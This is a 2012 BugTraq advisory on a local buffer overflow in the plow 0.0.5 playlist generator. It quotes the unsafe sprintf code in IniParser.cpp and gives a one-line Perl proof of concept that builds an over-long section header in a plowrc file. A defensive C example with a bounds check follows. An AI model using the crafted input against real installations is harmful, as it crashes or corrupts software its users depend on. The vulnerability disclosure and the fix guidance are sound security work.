BugTraq
plow 0.0.5 <= Buffer Overflow Vulnerability Jul 03 2012 12:11PM
pereira secbiz de (1 replies)
#################################################
plow 0.0.5 <= Buffer Overflow Vulnerability
#################################################

Discovered by: Jean Pascal Pereira <pereira (at) secbiz (dot) de [email concealed]>

Vendor information:

"plow is a command line playlist generator."

Vendor URI: http://developer.berlios.de/projects/plow/

#################################################

Risk-level: Medium

The application is prone to a local buffer overflow vulnerability.

-------------------------------------

IniParser.cpp, line 26:

26:     char buffer[length];
27:     char group [length];
28:
29:     char *option;
30:     char *value;
31:
32:     while(ini.getline(buffer, length)) {
33:         if(!strlen(buffer) || buffer[0] == '#') {
34:             continue;
35:         }
36:         if(buffer[0] == '[') {
37:             if(buffer[strlen(buffer) - 1] == ']') {
38:                 sprintf(group, "%s", buffer);
39:             } else {
40:                 err = 1;
41:                 break;
42:             }
43:         }

-------------------------------------

Exploit / Proof Of Concept:

Create a crafted plowrc file:

perl -e '$x="A"x1096;print("[".$x."]\nA=B")'>plowrc

-------------------------------------

Solution:

Do some input validation.

-------------------------------------

#################################################
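The kind of input validation the advisory's "Solution" section calls for, as an added example that is not plow's code: a section-header parser that checks the line length against the destination buffer before copying, instead of the unbounded sprintf(group, "%s", buffer) pattern quoted above. GROUP_MAX and the function names are assumptions for the example, not values from plow.

```c
#include <stdio.h>
#include <string.h>

/* Assumed destination size for the example; plow's own 'length' is not used here. */
#define GROUP_MAX 64

enum parse_result { PARSE_GROUP, PARSE_SKIP, PARSE_ERROR };

/* Copies a "[name]" line into group only if it is well-formed and fits, NUL included.
 * Returns PARSE_GROUP on success, PARSE_SKIP for blank/comment/non-header lines,
 * PARSE_ERROR for an unterminated or over-long header. */
enum parse_result parse_group_line(const char *line, char *group, size_t group_size)
{
    size_t len = strlen(line);

    if (len == 0 || line[0] == '#')
        return PARSE_SKIP;
    if (line[0] != '[')
        return PARSE_SKIP;           /* key=value lines are handled elsewhere */
    if (line[len - 1] != ']')
        return PARSE_ERROR;          /* unterminated header, same as the original's err = 1 */
    /* The check the original lacks: sprintf("%s") writes len+1 bytes no matter how
     * large group is, so refuse before any byte is copied. */
    if (len + 1 > group_size)
        return PARSE_ERROR;

    memcpy(group, line, len + 1);    /* bounded: len + 1 <= group_size was just verified */
    return PARSE_GROUP;
}

/* Constructs, in memory, a header of the same shape as the advisory's PoC file
 * (1096 'A's inside brackets) and confirms the parser rejects it rather than copying. */
int rejects_oversized_header(void)
{
    static char line[1096 + 3];
    char group[GROUP_MAX];
    line[0] = '[';
    memset(line + 1, 'A', 1096);
    line[1097] = ']';
    line[1098] = '\0';
    return parse_group_line(line, group, sizeof group) == PARSE_ERROR;
}

int main(void)
{
    char group[GROUP_MAX];
    printf("[music] -> %d\n", parse_group_line("[music]", group, sizeof group));
    printf("oversized header rejected: %d\n", rejects_oversized_header());
    return 0;
}
```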

Re: plow 0.0.5 <= Buffer Overflow Vulnerability Jul 08 2012 07:49AM
Henri Salo (henri nerv fi)
Copyright 2010, SecurityFocus